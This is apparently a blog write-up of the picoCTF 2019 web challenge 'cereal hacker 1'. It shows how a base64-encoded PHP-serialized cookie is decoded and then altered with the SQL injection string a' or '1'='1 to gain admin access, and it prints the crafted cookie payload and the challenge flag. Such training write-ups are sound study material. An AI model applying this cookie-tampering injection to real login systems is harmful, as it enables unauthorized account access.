Web – cereal hacker 1

cereal hacker 1 - 450pt

Challenge

Login as admin. https://2019shell1.picoctf.com/problem/49879/ or http://2019shell1.picoctf.com:49879

Hints

No hints

Solution

After a quick check on the code I tried to exploit the file parameter on the url, but with no result; after a lot of guessing we figured out one page name: admin
alt tag

It will be foundamental later. After a ton of guessing and a little hint from the official discord page of picoCTF we found that the credentials to log in as a regular user were: username=guest and password=guest
alt tag

The really intresting part in this page are the cookies, in fact there is a new cookie base64 encoded called user_info

TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiZ3Vlc3QiO3M6ODoicGFzc3dvcmQiO3M6NToiZ3Vlc3QiO30%253D

After decoding it I found out that it was serialized code (Click [here]() if you want to know more about serialization in php)

O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}6p

So after a little bit of tries I tried with an sql injection in the password field ant it worked!!

Payload:

TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoicGFzc3dvcmQiO3M6MTI6ImEnIG9yICcxJz0nMSI7fTZw

Actual serialized message:

O:11:"permissions":2:{s:8:"username";s:5:"admin";s:8:"password";s:12:"a' or '1'='1";}6p

And after sending it as a cookie in the admin page, it returned the flag
alt tag

picoCTF{0d040919669d2bc1501212f90450eb4c}

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *